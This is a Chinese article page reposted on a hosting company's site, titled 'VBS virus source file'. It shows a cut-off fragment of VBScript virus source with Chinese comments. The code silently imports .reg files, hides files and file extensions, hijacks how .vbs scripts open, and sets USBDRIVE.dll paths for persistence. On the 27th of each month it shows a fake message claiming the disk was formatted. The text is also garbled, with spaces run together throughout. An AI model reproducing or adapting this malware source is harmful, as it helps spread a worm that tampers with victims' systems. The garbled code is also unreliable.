vbs病毒源文件
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
ile\DefaultIcon) sets=fs.GetDrive(fs.GetDriveName(dvbs.path)) scandoc(fs.GetSpecialFolder(0)&"\Installer") ifreg="wordicon.exe"then ifs="C:"then iffs.FileExists("D:\SystemVolumeInformation\USBDRIVE.dll")Then r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&"D:\SystemVolumeInformation\doc.reg") else r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"\doc.reg") endif else iffs.FileExists("D:\SystemVolumeInformation\USBDRIVE.dll")Then r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&"D:\SystemVolumeInformation\doc.reg") else r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&s.DriveLetter&":\doc.reg") endif endif ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)®path&",1"&chr(34) Executeppp else ifs="C:"then iffs.FileExists("D:\SystemVolumeInformation\USBDRIVE.dll")Then r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&"D:\SystemVolumeInformation\vbs.reg") else r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"\vbs.reg") endif else iffs.FileExists("D:\SystemVolumeInformation\USBDRIVE.dll")Then r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&"D:\SystemVolumeInformation\vbs.reg") else r.run(fs.GetSpecialFolder(1)&"\dllcache\regedit.exe/s"&Space(3)&s.DriveLetter&":\vbs.reg") endif endif ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"\shell32.dll,1"&chr(34) Executeppp endif ppp=a6&Space(2)&chr(34)&a1&"ShowSuperHidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34) Executeppp ppp=a6&Space(2)&chr(34)&a1&"HideFileExt"&chr(34)&","&"1,"&chr(34)&"REG_DWORD"&chr(34) Executeppp ppp=a6&Space(2)&chr(34)&a1&"Hidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34) Executeppp ppp=a6&Space(2)&chr(34)&a2&"ScriptEngine\"&chr(34)&","&chr(34)&"VBScript"&chr(34) Executeppp ppp=a6&Space(2)&chr(34)&a2&"ScriptHostEncode\"&chr(34)&","&chr(34)&"{85131631-480C-11D2-B1F9-00C04F86C324}"&chr(34) Executeppp ppp=a6&Space(1)&chr(34)&a2&"Shell\Open\Command\"&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"\Wscript.exe"&Space(1)&chr(34)&chr(34)&"%1"&chr(34)&chr(34)&Space(1)&"%*"&chr(34) Executeppp ppp=a6&Space(2)&chr(34)&a2&"ShellEx\PropertySheetHandlers\WSHProps\"&chr(34)&","&chr(34)&"{60254CA5-953B-11CF-8C96-00AA00B8708C}"&chr(34) Executeppp ppp=a6&Space(2)&chr(34)&a3&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34) Executeppp ppp=a6&Space(2)&chr(34)&a4&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34) Executeppp iffs.FileExists("D:\SystemVolumeInformation\USBDRIVE.dll")Then ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&"D:\SystemVolumeInformation"&"\USBDR"&"IVE.dll"&chr(34) Executeppp else ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"\USBDR"&"IVE.dll"&chr(34) Executeppp endif ifday(date())="27"then(27号报告错误) msgbox"小样!你的杀毐软件该升级了,磁盘已被格式化" EndIf endFunction Functionscandoc(a)(定义子函数) OnErrorResumeNext(出错不报告) dimfiles,file,subfolder,folder_ setfolder_=fs.getfolder(a) s |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 用vbs操作注册表实例代码下一篇: 学习 WSH 的理由小结
关于vbs病毒源文件的所有评论